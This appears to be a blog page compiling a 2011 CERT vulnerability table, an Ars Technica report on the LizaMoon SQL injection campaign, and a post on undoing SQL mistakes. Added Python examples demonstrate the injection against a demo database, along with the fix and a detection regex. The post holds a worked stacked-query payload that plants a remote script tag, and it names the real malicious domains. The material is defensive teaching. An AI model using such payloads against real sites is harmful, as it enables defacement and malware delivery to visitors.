joomla — joomla! | Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URI to includes/application.php, reachable through index.php; and, when Internet Explorer or Konqueror is used, (2) allow remote attackers to inject arbitrary web script or HTML via the searchword parameter in a search action to index.php in the com_search component. NOTE: vector 2 exists because of an incomplete fix for CVE-2011-2509. | 2011-07-27 | 4.3 | CVE-2011-2710
joomla — joomla! | templates/system/error.php in Joomla! before 1.5.23 might allow remote attackers to obtain sensitive information via unspecified vectors that trigger an undefined value of a certain error field, leading to disclosure of the installation path. NOTE: this might overlap CVE-2011-2488. | 2011-07-27 | 5.0 | CVE-2011-2889
joomla — joomla! | The MediaViewMedia class in administrator/components/com_media/views/media/view.html.php in Joomla! 1.5.23 and earlier allows remote attackers to obtain sensitive information via vectors involving the base variable, leading to disclosure of the installation path, a different vulnerability than CVE-2011-2488. | 2011-07-27 | 5.0 | CVE-2011-2890
joomla — joomla! | Joomla! 1.6.x before 1.6.2 allows remote attackers to obtain sensitive information via an empty Itemid array parameter to index.php, which reveals the installation path in an error message, a different vulnerability than CVE-2011-2488. | 2011-07-27 | 5.0 | CVE-2011-2891
joomla — joomla! | Joomla! 1.6.x before 1.6.2 does not prevent page rendering inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. | 2011-07-27 | 4.3 | CVE-2011-2892
likewise — likewise_open | SQL injection vulnerability in lsassd in Lsass in the Likewise Security Authority in Likewise Open 5.4 through 6.1, and Likewise Enterprise 6.0, allows local users to execute arbitrary SQL commands via unspecified vectors. | 2011-07-26 | 5.8 | CVE-2011-2467
linux — kernel | The gfs2_fallocate function in fs/gfs2/file.c in the Linux kernel before 3.0-rc1 does not ensure that the size of a chunk allocation is a multiple of the block size, which allows local users to cause a denial of service (BUG and system crash) by arranging for all resource groups to have too little free space. | 2011-07-28 | 4.9 | CVE-2011-2689
linux — kernel | Multiple off-by-one errors in the ext4 subsystem in the Linux kernel before 3.0-rc5 allow local users to cause a denial of service (BUG_ON and system crash) by accessing a sparse file in extent format with a write operation involving a block number corresponding to the largest possible 32-bit unsigned integer. | 2011-07-28 | 4.9 | CVE-2011-2695
mega-nerd — libsndfile | Integer overflow in libsndfile before 1.0.25 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PARIS Audio Format (PAF) file that triggers a heap-based buffer overflow. | 2011-07-26 | 6.8 | CVE-2011-2696
redhat — network_satellite_server | Cross-site request forgery (CSRF) vulnerability in the Spacewalk Java site packages (aka spacewalk-java) 1.2.39 in Spacewalk, as used in the server in Red Hat Network Satellite 5.3.0 through 5.4.1 and other products, allows remote attackers to hijack the authentication of arbitrary users for requests that (1) disable the current user account, (2) add user accounts, or (3) modify user accounts to have administrator privileges. | 2011-07-26 | 6.8 | CVE-2009-4139
redhat — jboss_enterprise_application_platform | jboss-seam.jar in the JBoss Seam 2 framework 2.2.x and earlier, as distributed in Red Hat JBoss Enterprise SOA Platform 4.3.0.CP04 and 5.1.0 and JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.3.0.CP09 and 5.1.0, does not properly restrict use of Expression Language (EL) statements in FacesMessages during page exception handling, which allows remote attackers to execute arbitrary Java code via a crafted URL to an application. | 2011-07-26 | 6.8 | CVE-2011-1484
redhat — jboss_enterprise_application_platform | jboss-seam.jar in the JBoss Seam 2 framework 2.2.x and earlier, as distributed in Red Hat JBoss Enterprise SOA Platform 4.3.0.CP05 and 5.1.0; JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.3.0, 4.3.0.CP09, and 5.1.1; and JBoss Enterprise Web Platform 5.1.1, does not properly restrict use of Expression Language (EL) statements in FacesMessages during page exception handling, which allows remote attackers to execute arbitrary Java code via a crafted URL to an application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1484. | 2011-07-26 | 6.8 | CVE-2011-2196
rockwellautomation — factorytalk_diagnostics_viewer | Unspecified vulnerability in Rockwell Automation FactoryTalk Diagnostics Viewer before V2.30.00 (CPR9 SR3) allows local users to execute arbitrary code via a crafted FactoryTalk Diagnostics Viewer (.ftd) configuration file, which triggers memory corruption. | 2011-07-28 | 6.9 | CVE-2011-2957
videolan — vlc_media_player | Heap-based buffer overflow in the DemuxAudioSipr function in real.c in the RealMedia demuxer in VideoLAN VLC media player 1.1.x before 1.1.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted Real Media file. | 2011-07-26 | 6.8 | CVE-2011-2587
videolan — vlc_media_player | Heap-based buffer overflow in the AVI_ChunkRead_strf function in libavi.c in the AVI demuxer in VideoLAN VLC media player before 1.1.11 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted AVI media file. | 2011-07-26 | 6.8 | CVE-2011-2588

Low Vulnerabilities
Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
linux — kernel | The bluetooth subsystem in the Linux kernel before 3.0-rc4 does not properly initialize certain data structures, which allows local users to obtain potentially sensitive information from kernel memory via a crafted getsockopt system call, related to (1) the l2cap_sock_getsockopt_old function in net/bluetooth/l2cap_sock.c and (2) the rfcomm_sock_getsockopt_old function in net/bluetooth/rfcomm/sock.c. | 2011-07-28 | 1.9 | CVE-2011-2492

Source:  CERT.org


Massive SQL injection attack making the rounds—694K URLs so far

Friday, April 1st, 2011

Hundreds of thousands of URLs have been compromised—at the time of writing, 694,000—in an enormous and indiscriminate SQL injection attack. The attack has modified text stored in databases, with the result that pages served up by the attacked systems include within each page one or more references to a particular JavaScript file.

The attack appears to be indiscriminate in its targets, with compromised machines running ASP, ASP.NET, ColdFusion, JSP, and PHP, and no doubt others. SQL injection attacks, which exploit badly-written Web applications to perform actions directly against their databases, are largely independent of the technology used to develop the applications: the programming errors that allow SQL injection can be made in virtually any language. The underlying cause is a programmer trusting input that comes from a Web page, either a value from a form or a parameter in a URL, and splicing it directly into the text of a database query. If the input is crafted in a particular way, the database runs SQL statements of the attacker's choosing instead of, or in addition to, the ones the programmer intended.

In this case, the injected SQL is simply updating text fields within the database, to make them include an extra fragment of HTML. This HTML in turn loads a JavaScript from a remote server, typically “http://lizamoon.com/ur.php” or more recently, “http://alisa-carter.com/ur.php.” Both domain names resolve to the same IP address, and presently that server is not functional, leaving browsers unable to load the malicious script when they visit infected pages. Previously, it contained a simple script to redirect users to a fake anti-virus site.
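To make the mechanism concrete, here is an added example, not code from the article or from any of the affected sites: a Python script that reproduces a LizaMoon-style stacked-query injection against an in-memory SQLite database, shows the parameterized query that defeats it, and scans text columns for the injected markup. The articles table, its rows, the payload and the host name malicious.invalid in the injected tag are all constructed for the demonstration; sqlite3's executescript() stands in for a database driver that executes several statements in one batch, as classic ASP/ADO against SQL Server does.

```python
"""Added example, not code from the Ars Technica article or from any
affected site: a stacked-query SQL injection of the LizaMoon type against
an in-memory SQLite database, the parameterized query that defeats it, and
a scan for the injected markup. The table, its rows and the payload's host
name are all constructed for this demonstration."""
import re
import sqlite3

# Constructed sample rows standing in for a CMS's article table.
SEED_ROWS = [
    (1, "Spring sale", "Everything 20% off this week."),
    (2, "Opening hours", "We are open 9-5, Monday to Friday."),
]

# Constructed placeholder host; the real campaign loaded .../ur.php from a
# succession of attacker-controlled domains.
INJECTED_TAG = '<script src="http://malicious.invalid/ur.php"></script>'

# Indicator a defender can search text columns for: a script tag whose
# src ends in ur.php, the one constant across the campaign's domains.
IOC_PATTERN = re.compile(r'<script[^>]+src=["\']?[^"\'>]*ur\.php', re.IGNORECASE)


def fresh_articles_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SEED_ROWS)
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, article_id: str) -> None:
    """The bug the article describes: a URL parameter spliced straight into
    the SQL text. executescript() emulates a driver that runs stacked
    statements in one batch, as classic ASP/ADO against SQL Server does;
    sqlite3's execute() would refuse the second statement."""
    sql = "SELECT title FROM articles WHERE id = '" + article_id + "'"
    conn.executescript(sql)


def safe_lookup(conn: sqlite3.Connection, article_id: str):
    """The fix: the value travels as a bound parameter, never as SQL text,
    so the payload is just a string that matches no row."""
    row = conn.execute("SELECT title FROM articles WHERE id = ?", (article_id,)).fetchone()
    return row[0] if row else None


def find_injected(conn: sqlite3.Connection) -> list:
    """Post-incident check: ids of rows whose body carries the indicator.
    The LIKE pre-filter keeps the regex off rows that cannot match."""
    rows = conn.execute("SELECT id, body FROM articles WHERE body LIKE '%<script%'")
    return [article_id for article_id, body in rows if IOC_PATTERN.search(body)]


def demo():
    """Runs the same payload through both code paths and returns the ids the
    scanner flags after each: [1, 2] after the vulnerable path, [] after the
    safe one."""
    # Closes the original quote, appends the script tag to every row, then
    # re-balances the quote the application adds after the parameter.
    payload = "1'; UPDATE articles SET body = body || '" + INJECTED_TAG + "' WHERE '1' = '1"

    vulnerable_db = fresh_articles_db()
    vulnerable_lookup(vulnerable_db, payload)

    hardened_db = fresh_articles_db()
    safe_lookup(hardened_db, payload)

    return find_injected(vulnerable_db), find_injected(hardened_db)


if __name__ == "__main__":
    flagged_vulnerable, flagged_safe = demo()
    print("rows infected via string concatenation:", flagged_vulnerable)
    print("rows infected via bound parameter:     ", flagged_safe)
```

Run directly, it prints [1, 2] for the concatenated query, meaning every row now carries the script tag, and [] for the parameterized one. The find_injected() check is the part worth keeping after an incident like this: the domain changed from wave to wave, but the ur.php file name did not, so a LIKE pre-filter followed by a regex on the script tag's src finds the injected fragment regardless of which host it points at.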

The massive scale of these attacks (and the rapidly growing number of affected URLs) was first noticed by Websense Security Labs. On Tuesday, around 28,000 URLs were compromised; now more than 20 times more URLs are infected, and the numbers are still growing.

The injected code is also found on a number of product pages on Apple’s iTunes Store. Apple fetches RSS feeds from podcasters that broadcast using iTunes, and in a number of cases these broadcasters have been compromised by the SQL injection attack. As a result, the malicious code has made its way into Apple’s system. However, due to the way Apple processes the RSS feeds, there appears to be no exploitation vector; the injected HTML is safely nullified.

SQL injections following this pattern appear to have been happening off and on for six or more months now. The domain name hosting the JavaScript changes each time, but the file name—ur.php—and the style of injection remain consistent. The actions of the scripts have been similar too; pop-up windows and malware downloads. Previous efforts were on a much smaller scale, however: hundreds of compromised URLs instead of hundreds of thousands. In these earlier cases, the attacks originated from IP addresses in eastern Europe and Russia.

It’s been a busy week for SQL injection; at the weekend, MySQL.com, the website of Oracle-owned open source database MySQL, was hacked, again using SQL injection. A little embarrassing for a database vendor to be unable to use its own database securely.

Source:  arstechnica.com

MSDN: Creating databases in Visual Basic

Monday, December 27th, 2010

The Microsoft Developer Network is a pretty valuable resource for anyone looking for answers regarding Microsoft programming concepts, tips, tutorials, even platform-specific error resolution and workarounds.  For SQL newbies looking to hone their skills, you may find this MSDN video introduction to Visual Basic database creation helpful.  Enjoy…


Undo changes to SQL database? Well, sort of….

Monday, May 24th, 2010

Not too far back, a client who spends all day (and sometimes all night) creating and running SQL queries and commands in a secure database posed an interesting question:  When working late at night, he’s concerned that he will accidentally botch a SQL command and cause irreparable harm to the database – is there such a thing as an undo button in SQL?


Sorry, the short answer is no: there is no Ctrl+Z equivalent that will magically undo a disastrous command once it has been committed to the database, and most query tools run in autocommit mode, so every statement you execute is committed the moment it completes. If you find this post during a panic-induced hunt for ways to repair an error you made a few hours ago, your options are few and far between:


  • You can restore all or part of the database from a backup (you do have a backup, don't you?), which is the start of a whole new problem that possibly now involves your boss
  • You can roll back a transaction, but only while it is still open; once it has been committed there is nothing left to roll back
  • You can roll back part of an open transaction to a named savepoint, keeping the work done before that point; like a full rollback, this only works before the transaction is committed


Undoing individual transactions piecemeal in a SQL database can leave it in an inconsistent state, because later changes may depend on the ones you remove.  It is therefore not only advisable but necessary to examine how each operation relates to the others before altering the data or the database structure.  Transaction logs record changes only, and it can be difficult to piece together how individual changes relate to the big picture.  Third-party software such as this SQL transaction log tool can assist by providing an operation-by-operation breakdown of each change to give you greater perspective.  This SQL Server transaction log restore tutorial may help if you are forced to restore prior versions of the database or of file groups, or to restore to a point in time.


Another tip when working on something extremely sensitive (or late at night when normal people are sleeping) is to disable autocommit with SET IMPLICIT_TRANSACTIONS ON, which makes SQL Server open a transaction automatically at your first statement and keep it open until you explicitly COMMIT or ROLLBACK.  The setting applies only to the current session, and an open transaction holds its locks until you end it, so check the affected-row counts and then commit or roll back promptly rather than leaving the transaction hanging.  The same option is available in Microsoft SQL Query Analyzer under TOOLS>OPTIONS>CONNECTION PROPERTIES.
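The options above, worked through in an added example that is not part of the post: the same botched UPDATE run in autocommit mode, inside an explicit transaction, and after a savepoint. SQLite stands in for SQL Server because it runs without a server; the statements differ (SQLite's SAVEPOINT / ROLLBACK TO correspond to SAVE TRANSACTION / ROLLBACK TRANSACTION name in T-SQL, and BEGIN / COMMIT to BEGIN TRANSACTION / COMMIT) but the discipline of reviewing a change before committing it is identical. The accounts table and its rows are constructed for the demonstration.

```python
"""Added example, not code from the post: the undo options the post lists,
exercised against an in-memory SQLite database. SQLite stands in for SQL
Server here; the statements differ (SAVEPOINT / ROLLBACK TO below versus
SAVE TRANSACTION / ROLLBACK TRANSACTION name in T-SQL) but the discipline
of reviewing a change before committing it is the same. The accounts table
and its rows are constructed for this demonstration."""
import sqlite3

SEED_ROWS = [(1, "alice", 120.0), (2, "bob", 80.0), (3, "carol", 45.5)]


def fresh_accounts_db() -> sqlite3.Connection:
    # isolation_level=None leaves transaction control entirely to the SQL we
    # send: without an explicit BEGIN every statement autocommits, which is
    # exactly the mode the post warns about.
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, balance REAL)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def balances(conn: sqlite3.Connection) -> dict:
    return dict(conn.execute("SELECT owner, balance FROM accounts ORDER BY id"))


def botched_in_autocommit() -> dict:
    """The late-night mistake: the WHERE clause is forgotten. In autocommit
    mode the statement is durable as soon as it returns, so rollback() has
    no open transaction to act on and every balance stays at 0."""
    conn = fresh_accounts_db()
    conn.execute("UPDATE accounts SET balance = 0")  # meant: WHERE id = 3
    conn.rollback()  # nothing pending: this is a no-op, not an undo
    return balances(conn)


def botched_in_explicit_transaction() -> dict:
    """The same mistake inside an explicit transaction. The affected-row
    count is the cheap sanity check: one row was intended, three were hit,
    so the change is rolled back instead of committed."""
    conn = fresh_accounts_db()
    conn.execute("BEGIN")
    cur = conn.execute("UPDATE accounts SET balance = 0")  # meant: WHERE id = 3
    if cur.rowcount == 1:
        conn.execute("COMMIT")
    else:
        conn.execute("ROLLBACK")
    return balances(conn)


def partial_undo_with_savepoint() -> dict:
    """A savepoint marks a point inside the open transaction that can be
    rolled back to without losing the verified work done before it."""
    conn = fresh_accounts_db()
    conn.execute("BEGIN")
    conn.execute("UPDATE accounts SET balance = balance + 10 WHERE id = 1")  # intended
    conn.execute("SAVEPOINT before_bulk_update")
    conn.execute("UPDATE accounts SET balance = 0")  # the mistake
    conn.execute("ROLLBACK TO before_bulk_update")  # undoes only the mistake
    conn.execute("RELEASE before_bulk_update")
    conn.execute("COMMIT")
    return balances(conn)


if __name__ == "__main__":
    print("autocommit, no undo:    ", botched_in_autocommit())
    print("explicit transaction:   ", botched_in_explicit_transaction())
    print("savepoint, partial undo:", partial_undo_with_savepoint())
```

The first function returns every balance zeroed, which is the situation the post's client is afraid of; the second returns the original balances because the row count exposed the mistake before COMMIT; the third keeps alice's intended +10 while discarding the bulk update. None of this helps once COMMIT has run, which is why the habit of opening the transaction yourself, or switching the session to implicit transactions, has to come before the mistake rather than after it.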


Of course, you could go to bed at a decent hour instead of executing SQL commands after midnight like some kind of crazy nocturnal code monkey.  Or just be more careful, whatever works for you….